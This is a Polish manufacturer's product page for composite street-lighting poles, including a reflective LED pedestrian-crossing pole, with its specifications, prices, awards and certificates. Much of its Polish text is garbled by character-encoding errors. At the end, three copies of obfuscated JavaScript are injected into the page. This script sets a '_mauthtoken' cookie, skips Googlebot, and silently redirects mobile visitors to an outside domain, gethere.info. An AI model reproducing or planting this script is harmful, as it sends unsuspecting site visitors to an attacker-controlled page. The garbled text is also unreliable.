Słupy oświetleniowe

Słupy kompozytowe

SAi??up na przejAi??cia dla pieszych

zalety kompozytu

Kompozyt to materiaAi?? zbudowany z co najmniej dwóch róA?nych skAi??adników poAi??Ai??czonych w celu uzyskania nowego „lepszego” materiaAi??u. DoskonaAi??ym przykAi??adem tego typu synergii jest pAi??yta kartonowo-gipsowa, gdzie Ai??Ai??czAi??c dwa na pozór kruche materiaAi??y: gips i papier, uzyskano produkt o duA?ych parametrach wytrzymaAi??oAi??ciowych. Kompozyt polimerowy to poAi??Ai??czenie A?ywic poliestrowych, tkanin szklanych oraz mat szklanych w celu uzyskania materiaAi??u o wysokich parametrach wytrzymaAi??oAi??ciowych, odpowiedniego do produkcji sAi??upów oAi??wietleniowych.

Schemat kompozytu

 
OszczAi??dnoAi??ci

 

TANI MONTAAi??

LEKKI PRODUKT – TANI TRANSPORT

NIEPOTRZEBNY CIA?Ai??KI SPRZA?T MONTAAi??OWY

TANIE SPOSOBY OSADZANIA SA?UPÓW

II KL. OCHRONNOAsCI – BRAK KOSZTÓW BEDNARKI

 

 

BRAK KOSZTÓW EKSPLOATACJI

SA?UP NIE KORODUJE

NIE ZMIENIA KOLORU

NIEPOTRZEBNA KONSERWACJA FARBAi??

NIE STANOWI WARTOAsCI ZA?OMOWEJ

BRAK OKRESOWYCH BADAA? NA IZOLACYJNOAsAi?? SA?UPÓW

 

 

PRODUKCJA – NISKA EMISJA CO2

OdziaAi??ywanie CO2 przy produkcji i eksploatacji sAi??upa kompozytowego:

Produkcja sAi??upów kompozytowych jest przyjazna Ai??rodowisku, gdyA? emisja CO2 jest bardzo niska, a sAi??up kompozytowy poddaje siAi?? 100% przetworzeniu. Kompozyt jest najkorzystniejszym surowcem ze wzglAi??du na swoje parametry, wAi??aAi??ciwoAi??ci, moA?liwoAi??ci recyklingu i emisjAi?? CO2 do atmosfery. Kompozyty przewyA?szajAi?? przyjaznoAi??Ai?? Ai??rodowiska w stosunku do innych materiaAi??ów w ciAi??gu ich „A?ycia” ze wzglAi??du na dAi??ugi okres eksploatacji, brak koniecznoAi??ci obsAi??ugi w trakcie eksploatacji, niA?sza energochAi??onnoAi??Ai?? przy ich przetwarzaniu, Ai??atwy i nisko energochAi??onny proces recyklingu. Produkcja i wytwarzanie kompozytów czAi??sto zuA?ywa mniej energii niA? produkcja metali dlatego, A?e kompozyty waA?Ai?? mniej, iloAi??Ai?? energii zuA?yta podczas transportu jest takA?e mniejsza.

Kolorystyka

Kolory sAi??upów w ofercie standardowej to RAL 7032, RAL 7042, RAL 6005, RAL 7021. KaA?demu sAi??upowi moA?na nadaAi?? dowolnAi?? barwAi??, w kolorach zbliA?onych do palety RAL. Istnieje moA?liwoAi??Ai?? produkcji sAi??upów wielokolorowych. Barwienie sAi??upa na inny kolor z palety RAL za dopAi??atAi??.

 
Estetyka

UA?ycie najwyA?szej jakoAi??ci materiaAi??ów powoduje, A?e sAi??up jest odporny na promienie UV.

GAi??adka powierzchnia uAi??atwia usuwanie zabrudzeAi??, nawet pozostaAi??oAi??ci po kleju i taAi??mach, uA?ywanych do wieszania plakatów
i ogAi??oszeAi??. SAi??up moA?na szybko i skutecznie oczyAi??ciAi?? stosujAi??c Ai??rodki czyszczAi??ce firmy Alumast. Dodatkowo powierzchnia sAi??upa moA?e byAi?? pokryta powAi??okami silikonowymi wykonanymi w nanotechnologii, które jeszcze bardziej zabezpieczajAi?? sAi??up przed zabrudzeniami i klejem.

 
TrwaAi??oAi??Ai??

Kompozyt poliestrowo-szklany nie ulega korozji.

SAi??up kompozytowy wkopywany nie zawiera elementów metalowych, które mogAi??yby skorodowaAi??- dziAi??ki temu jest odporny na:

- sól drogowAi?? i inne Ai??rodki uA?ywane do odAi??nieA?ania i czyszczenia ulic,

- zanieczyszczenia powstaAi??e w ruchu ulicznym,

- zanieczyszczenia pochodzAi??ce od zwierzAi??t

 

Kompozytowe drzwiczki rewizyjne nie majAi?? wartoAi??ci w skupie zAi??omu. Eliminuje to w znacznym stopniu moA?liwoAi??Ai?? kradzieA?y oraz znacznie ogranicza iloAi??Ai?? dewastacji, dekompletacji i zwiAi??zanych z tym napraw. Kompletny sAi??up kompozytowy ogranicza dostAi??p do zAi??Ai??cza osobom niepowoAi??anym.

OdpornoAi??Ai?? na niekorzystne czynniki zewnAi??trzne

 
BezpieczeAi??stwo

Kompozyt poliestrowo-szklany jest materiaAi??em izolacyjnym. SAi??up kompozytowy wkopywany nie zawiera elementów metalowych, które wymagaAi??yby uziemienia.

Nie ma moA?liwoAi??ci wykonania poAi??Ai??czenia galwanicznego pomiAi??dzy sAi??upem kompozytowym wkopywanym a przewodami czynnymi instalacji, elementami ochrony przepiAi??ciowej lub ochrony przeciwporaA?eniowej. Nawet podczas uszkodzenia izolacji przewodów, zawilgocenia lub dewastacji na powierzchni sAi??upa kompozytowego wkopywanego nie pojawi siAi?? napiAi??cie niebezpieczne.

 

SAi??up kompozytowy tylko w nieznacznym stopniu pochAi??ania energiAi?? podczas kolizji – pojazd po zderzeniu kontynuuje jazdAi?? ze zmniejszonAi?? prAi??dkoAi??ciAi??.

Jak wykazaAi??y przeprowadzone badania wartoAi??Ai?? krytycznego dla bezpieczeAi??stwa wskaA?nika ASI (wskaA?nik intensywnoAi??ci przyspieszenia – zgodnie z normAi?? PN-EN 1317) jest piAi??ciokrotnie niA?sza niA? wartoAi??Ai??, przy której skutki zderzenia sAi?? niebezpieczne lub Ai??miertelne dla osób znajdujAi??cych siAi?? w pojeA?dzie. Wielowarstwowa konstrukcja kompozytowa doskonale tAi??umi drgania powstajAi??ce w ruchu ulicznym oraz pochodzAi??ce od trakcji tramwajowej i kolejowej. WpAi??ywa to na przedAi??uA?enie A?ywotnoAi??ci lamp wyAi??adowczych i ukAi??adów zapAi??onowych stosowanych w oprawach ulicznych.

 
MontaA? i logistyka

Uniwersalna tuleja aluminiowa fi 60, montowana w górnej czAi??Ai??ci sAi??upa, pozwala na montaA? typowych opraw ulicznych z uchwytem do montaA?u pionowego. Zastosowanie wysiAi??gnika lub uchwytu regulowanego pozwala na montaA? typowych opraw ulicznych
z uchwytem do montaA?u bocznego. DziAi??ki wiAi??kszej Ai??rednicy wewnAi??trznej- nawet o 60% prace instalacyjne wewnAi??trz sAi??upów kompozytowych- moA?na wykonaAi?? szybciej i dokAi??adniej. Pozwala to na póA?niejszAi?? bezproblemowAi?? eksploatacjAi??.

Zastosowanie lekkiego sAi??upa kompozytowego wkopywanego pozwala na rezygnacjAi?? z ciAi??A?kiego fundamentu betonowego. UAi??atwia to transport, montaA? i demontaA? (w przypadku kolizji), który moA?e wykonaAi?? dwóch monterów, bez uA?ycia maszyn i w znacznie krótszym czasie. ObniA?a to znaczAi??co koszty inwestycji i eksploatacji.

SAi??up kompozytowy wkopywany o wysokoAi??ci 9m waA?y tylko 39kg

 

NIAi??SZE KOSZTY INSTALACJI SA?UPA WKOPYWANEGO – brak podstawy i fundamentu

SZYBSZA INSTALACJA – 9-metrowy sAi??up wkopywany waA?y tylko 39 kg

NIAi??SZE KOSZTY TRANSPORTU I MONTAAi??U – sAi??up nie wymaga ciAi??A?kiego fundamentu

UA?ATWIENIE PONOWNEGO MONTAAi??U SA?UPA – w sytuacji koniecznoAi??ci jego wymiany np. w przypadku uszkodzenia sAi??upa podczas kolizji drogowej lub modernizacji caAi??ego oAi??wietlenia ulicznego.

opis produktu

SAi??up oAi??wietleniowy z kompozytów na przejAi??cia dla pieszych

SAi??up na przejAi??cia dla pieszych

SAi??up kompozytowy na przejAi??cia dla pieszych to kolejne autorskie rozwiAi??zanie firmy Alumast S.A.. Zastosowanie mikrokulek szklanych, odbijajAi??cych Ai??wiatAi??o nadjeA?dA?ajAi??cych aut, zwiAi??ksza widocznoAi??Ai?? konstrukcji i jest sygnaAi??em dla kierowcy o zbliA?aniu siAi?? do przejAi??cia dla pieszych. Dodatkowym elementem, który sygnalizuje umiejscowienie przejAi??cia dla pieszych, jest taAi??ma LED, wmontowana w konstrukcjAi?? sAi??upa. SAi??up kompozytowy na przejAi??cia dla pieszych Alumast S.A. zostaAi?? nagrodzony brAi??zowym medalem na MiAi??dzynarodowych Targach Energetab 2010 w Bielsku-BiaAi??ej.

 

ODBLASKOWA POWIERZCHNIA

TAAsMA LED W KOLORACH RGB

DOBRA WIDOCZNOAsAi?? W NOCY

DUAi??A OSZCZA?DNOAsAi?? PRZY SA?UPACH WKOPYWANYCH

WYSOKIE BEZPIECZEA?STWO BIERNE


 

dane techniczne

W sAi??upach zainstalowano dwa paski ledowe w kolorze zbliA?onym do A?óAi??tego o dAi??ugoAi??ci 2m kaA?dy (Ai??wiecAi??ca czAi??Ai??Ai??).
TaAi??my ledowe usytuowane sAi?? prostopadle do jezdni (widoczne z dwóch stron pasa drogowego).
Zastosowane taAi??my sAi?? wodoszczelne (IP 66), zasilane napiAi??ciem bezpiecznym (do 24V).
Dodatkowe oAi??wietlenie LED powoduje, A?e sAi??upy, a tym samym przejAi??cia dla pieszych widoczne sAi?? ze znacznej odlegAi??oAi??ci.

 

PowAi??oka sAi??upa pokryta jest szklanymi mikrokulkami, które odbijajAi?? Ai??wiatAi??o nadjeA?dA?ajAi??cych aut.
PowAi??oka sAi??upa do wysokoAi??ci 2 metrów od podAi??oA?a wykoAi??czona jest refleksyjnymi mikrokulkami szklanymi, które nie reagujAi?? z wodAi??, kwasami, chlorkami, siarczanami i innymi zwiAi??zkami chemicznymi. Mikrokulki stosowane sAi?? m.in. do posypywania farb uA?ywanych przy malowaniu poziomego oznakowania dróg i zdecydowanie poprawiajAi?? widocznoAi??Ai?? danych obiektów w nocy.

akcesoria

Prefabrykowane fundamenty betonowe

 

Symbol produktu Cena [PLN]
F100/30 159
F120/43 223
 

 

Drzwiczki rewizyjne


 

Cena [PLN]
102
 

 

PAi??yn do czyszczenia

PAi??yn do czyszczenia masztA?w kompozytowych

Produkt Cena [PLN]
Easy cleaner – Asrodek do czyszczenia sAi??upów oAi??wietleniowych i masztów flagowych z naklejek, taAi??m klejAi??cych, ogAi??oszeAi?? reklamowych. 50
 

 

 

 

 

Wszystkie ceny netto. Nie zawierajAi?? podatku VAT.

certyfikaty, nagrody

Nagrody (produkty kompozytowe)

2015
 
 medal_expopower_2015

 

 

 

 

ZAi??oty medal za A?erdA? kompozytowAi?? podczas MiAi??dzynarodowych Targów Energetycznych EXPOPOWER 2015 dla SpóAi??ki zaleA?nej ENERGY COMPOSITES Sp. z o.o.

 
sl_swietlny

 

 

 

 

WyróA?nienie w konkursie na najlepszy wyrób targów za sAi??up Ai??wietlny z nadrukiem podczas XXIII MiAi??dzynarodowych Targów SprzAi??tu OAi??wietleniowego AswiatAi??o 2015.

 
 lumipole

 

 

 

 

WyrA?A?nienie w konkursie na najbardziej innowacyjny wyrA?b targA?w za kompozytowy sAi??up oAi??wietleniowy LUMIPOLE podczas XXIII MiAi??dzynarodowych TargA?w SprzAi??tu OAi??wietleniowego AswiatAi??o 2015.

 
2012
ENERGETAB 2010

 

 

WyróA?nienie w konkursie o puchar prezesa polsko-biaAi??oruskiej izby handlowo-przemysAi??owej dla firmy prezentujAi??cej najefektywniejsze ekonomiczne rozwiAi??zania technologiczno-organizacyjne w zakresie energetyki, na Lubelskich Targach Energetycznych ENERGETICS.

 

 

 

ENERGETAB 2010

 

 

 

Srebrny medal na miAi??dzynarodowych targach wynalazczoAi??ci, badaAi?? naukowych i nowych technik "BRUSSELS INNOVA" 2012 za sAi??up Ai??wietlny z odbAi??yAi??nikiem wykonany z kompozytów polimerowo-szklanych.

Brussels Innove

 

 

 

Rosyjski komitet organizacyjny targów "BRUSSELS INNOVA" 2012 nagrodziAi?? ALUMAST za aktywnAi?? promocjAi??
postAi??pu naukowo-mechanicznego i wysokie osiAi??gniAi??cia na 61-ej wystawie wynalazków, badaAi?? naukowych i nowych technologii w Brukseli 2012

 
2011

Lampa autonomiczna z rekomendacjAi?? Dobry Wzór 2011 DecyzjAi?? jury konkursu Dobry Wzór 2011 organizowanego przez Instytut Wzornictwa PrzemysAi??owego w Warszawie lampa autonomiczna – autorski produkt firmy Alumast S.A. – nie zostaAi??a niestety zakwalifikowana do finaAi??u tego konkursu. DuA?ym sukcesem jest jednak sam fakt zakwalifikowania produktu do grona uczestników konkursu – proces kwalifikacji trwaAi?? kilka miesiAi??cy i objAi??Ai?? kilkaset nowych produktów z caAi??ej Polski.

WiAi??cej na stronie Instytutu Wzornictwa PrzemysAi??owego: http://www.iwp.com.pl/1670

 
ENERGETAB 2011

 

 

 

 

 

Lampa autonomiczna z oprawAi?? Ledal, produkt wykonany z kompozytów polimerowych, otrzymaAi??a Srebrny Medla PGE-Energia Odnawialna podczas targów ENERGETAB 2011 w Bielsku BiaAi??ej.

ENERGETICS 2011

 

 

 

 

 

Grupa produktów opartych na budowie sAi??upa kompozytowego z polimerów otrzymaAi??a WyróA?nienie w kategorii Produkt Roku podczas targów ENERGETICS 2011 w Lublinie.

 
2010
ENERGETAB 2010

 

 

 

 

SAi??up kompozytowy z powierzchniAi?? powlekanAi?? refleksyjnymi mikrokulkami szklanymi oraz z wbudowanAi?? taAi??mAi?? LED, z przeznaczeniem na bezpieczne przejAi??cia dla pieszych, otrzymaAi?? brAi??zowy medal na targach ENERGETAB 2010 w Bielsku-BiaAi??ej.

INFRASTRUKTURA

 

 

 

 

Grupa produktów: sAi??up kompozytowy, sAi??up kompozytowy z mechanizmem do jego poAi??oA?enia (Ai??amania), sAi??up kompozytowy z mikrokulkami szklanymi oraz sAi??up kompozytowy wielobarwny, otrzymaAi??a I nagrodAi?? Ministra Infrastruktury w kategorii "WyposaA?enie dróg i obiektów uA?ytecznoAi??ci publicznej" podczas targów INFRASTRUKTURA 2010 w Warszawie.

 
2008
ENERGETAB 2008

 

 

 

 

Produkt uzyskaAi?? wyróA?nienie niezaleA?nej komisji na targach Energetycznych ENERGETAB 2008 w Bielsku BiaAi??ej.

 

 

 

 

 

 

 

 

 

 

 

Certyfikaty (produkty kompozytowe)

Wojskowe Centrum Normalizacji, JakoAi??ci i Kodyfikacji nadaAi??o Firmie Natowski Kod Podmiotu Gospodarki Narodowej.

 

Certyfikat ZgodnoAi??ci (CE)

Produkt uzyskaAi?? Certyfikat ZgodnoAi??ci (CE) z normAi?? europejskAi?? PN EN 40-7:2004


Produkt uzyskaAi?? Certyfikat ZgodnoAi??ci z normAi?? PN-EN 60529,

PN-EN 62262 oraz PN-EN 50102;

stopieAi?? ochrony przed penetracjAi?? czynników zewnAi??trznych IP44,

stopieAi?? ochrony przed zewnAi??trznymi uderzeniami mechanicznymi IK10.

Produkcja sAi??upów oAi??wietleniowych odbywa siAi?? w oparciu o normy systemu zarzAi??dzania jakoAi??ciAi?? ISO.

 

 

 

Produkt uzyskaAi?? Certyfikat ZgodnoAi??ci (CE) z normAi?? europejskAi?? PN EN 40-7:2004

Certyfikat ZgodnoAi??ci (CE)Certyfikat ZgodnoAi??ci 2010

Produkt uzyskaAi?? pozytywnAi?? opiniAi?? Instytutu Kolejnictwa w Warszawie

 

 

 

PKP Polskie linie kolejowe

pkp

PKP Polskie linie kolejowe

PKP Energetyka

 

cenniki

Cennik

SzczegóAi??y u naszych przedstawicieli – KONTAKT

do pobrania


var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var 